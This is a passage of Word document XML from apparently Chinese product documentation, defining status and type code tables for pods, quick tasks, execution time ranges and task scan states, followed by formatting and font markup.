      <w:bookmarkStart w:id="621" w:name="_Toc115166383"/>
      <w:bookmarkStart w:id="622" w:name="pod状态"/>
      <w:bookmarkEnd w:id="620"/>
      <w:r>
        <w:t>pod状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="53E2FAF9"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D2AA546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08132D99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C8FEC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F6AEFFE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C304C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659A92AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F97E30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2448620C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4485ED84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F5BFBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC986E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5667C043" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E626F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237101C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415E36C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>succeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02808B82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6547B9FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BB6C4C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DA6C92C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="130B304E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1874AAB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC5A93D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FFA5E95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0767CC2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="623" w:name="_Toc115166384"/>
      <w:bookmarkStart w:id="624" w:name="快速任务类型"/>
      <w:bookmarkEnd w:id="622"/>
      <w:r>
        <w:t>快速任务类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="623"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="03EF60D6"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34107925" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77044D04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0B84B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C96A583" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1162AB11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11495CEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467EE150" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统内置任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2ACAB314" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A585834" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A3C6C8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1D36C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D44D0D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="_Toc115166385"/>
      <w:bookmarkStart w:id="626" w:name="快速任务执行时间范围"/>
      <w:bookmarkEnd w:id="624"/>
      <w:r>
        <w:t>快速任务执行时间范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1032"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1426"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C6E8278"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140BD7DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25650F61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310BCAC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57CE5EA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="268FF117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B20BB5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C1184F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="373820A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2311D8E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB9E9A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D45BB88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1~3分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D2555C5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F49951C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44EA4955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0C2CF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3~5分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76DCDAD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C584B32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524994D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDF76C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5~10分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C253CC1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11C3E0BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229197E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467CC884" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10~30分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6106B818" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B9898EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282F6349" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D00C15C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>超出30分钟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59D14A1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="_Toc115166386"/>
      <w:bookmarkStart w:id="628" w:name="快速任务扫描状态"/>
      <w:bookmarkEnd w:id="626"/>
      <w:r>
        <w:t>快速任务扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="02CCAA3C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D14E266" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353E2ECF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D96872E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F8F2C66" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00AB6DF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA5FF49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3F7598" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>准备执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EF73F04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A71947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F81728F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2414D9E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="735B46A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E3951B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7800F4CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57BC7181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B104C85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FB1E72F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36FEB53D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="647BC3B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="508"/>
      <w:bookmarkEnd w:id="628"/>
    </w:tbl>
    <w:p w14:paraId="26C0D0C6" w14:textId="5B1BC18A" w:rsidR="00B53D9B" w:rsidRPr="000449B2" w:rsidRDefault="00B53D9B" w:rsidP="00BC669E"/>
    <w:sectPr w:rsidR="00B53D9B" w:rsidRPr="000449B2" w:rsidSect="00506C5C">
      <w:headerReference w:type="default" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="567" w:footer="284"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25B1A" w14:textId="77777777" w:rsidR="00BB1115" w:rsidRPr="00DA4190" w:rsidRDefault="00BB1115" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA4190">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D619C6C" w14:textId="77777777" w:rsidR="00BB1115" w:rsidRPr="00DA4190" w:rsidRDefault="00BB1115" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA419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阿里巴巴普惠体 2.0 55 Regular">
    <w:panose1 w:val="00020600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002FF" w:usb1="7ACF7CFB" w:usb2="0000001E" w:usb3="00000000" w:csb0="0004009F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId1" w:subsetted="1" w:fontKey="{1F8D61B2-CDF2-4A33-B160-850DFE4E6A8E}"/>
